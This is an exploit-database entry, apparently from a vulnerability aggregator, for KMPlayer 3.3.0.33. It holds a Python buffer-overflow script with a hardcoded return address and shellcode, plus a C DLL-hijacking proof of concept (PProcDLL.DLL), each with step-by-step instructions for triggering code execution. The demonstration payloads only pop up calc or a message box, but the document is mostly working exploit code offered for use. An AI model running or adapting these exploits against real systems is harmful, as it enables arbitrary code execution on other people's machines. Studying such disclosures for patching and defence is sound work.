KMPlayer 3.3.0.33 - Multiple Vulnerabilities

🗓️ 01 Jul 2014 00:00:00Reported by RootType

KMPlayer v3.3.0.33 multiple vulnerabilities including buffer overflow and DLL hijackin


                                                # Exploit Title: The KMPlayer v3.3.0.33 Multiple Vulnerabilities
# Date: October, 26, 2012
# Discovered By: Mr.XHat
# Exploit Author: Mr.XHat
# E-Mail: Mr.XHat {AT} Gmail.com
# Vendor: http://www.kmplayer.com/
# Version: 3.3.0.33
# Tested On: WinXP SP3 EN
#########################

# Buffer Overflow Vulnerability:

junk = &#34;\x41&#34; * 250
eip = &#34;\xD7\x30\x9D\x7C&#34;
shellcode = (
&#34;\x31\xC9\x51\x68\x63\x61\x6C\x63&#34;
&#34;\x54\xB8\xC7\x93\xC2\x77\xFF\xD0&#34;
)
exploit = junk + eip + shellcode
file = open(&#34;Exploit.txt&#34;, &#34;w&#34;)
file.write(exploit)
file.close()

# How To Do Exploit:
# First Run The KMPlayer And Get To Playlist &#62; Playlist Editor... &#62; Add New album Then Past Exploit Code To &#34;Album Name:&#34;, Now Your Shellcode Will Executed!
############################################################################################################################################################

# DLL Hijacking Vulnerability:

# DLL Name: PProcDLL.DLL

# How To Do Hijack:
First Compile Below Source Code With C Compiler(s) And Rename Compiled DLL To PProcDLL.DLL Then Copy It To The KMPlayer Installed Path, Now If You Run The KMPlayer DLL Will Hijacked!

#include &#60;windows.h&#62;
BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved)
{
    switch (fdwReason)
    {
        case DLL_PROCESS_ATTACH:
        dll_hijack();
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
        case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
int dll_hijack()
{
    MessageBox(0, &#34;DLL Hijacked!&#34;, &#34;Mr.XHat&#34;, MB_OK);
}
#

# Enjoys!

01 Jul 2014 00:00Current

7.1High risk

Vulners AI Score7.1